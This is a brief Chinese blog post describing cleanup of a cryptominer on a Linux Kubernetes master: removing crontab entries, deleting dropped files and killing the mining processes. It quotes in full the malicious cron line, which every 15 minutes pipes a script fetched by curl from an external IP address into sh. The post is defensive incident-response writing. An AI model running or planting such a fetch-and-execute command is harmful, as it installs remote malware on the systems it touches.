linux被病毒感染 CPU使用很高

被当矿机。。挖矿 

这个机器运行着k8s master 跑着几十个应用和DB 不能重装

linux被病毒感染 CPU使用很高_第1张图片

crontab -e  查到

dd掉这段 删除

后续处理:

删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root

删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce

kill掉进程:6Tx3Wq,lrnbbce

此时挖矿程序已经清理,后续可以删除被增加的hosts等文件

 

你可能感兴趣的:(linux系统文章)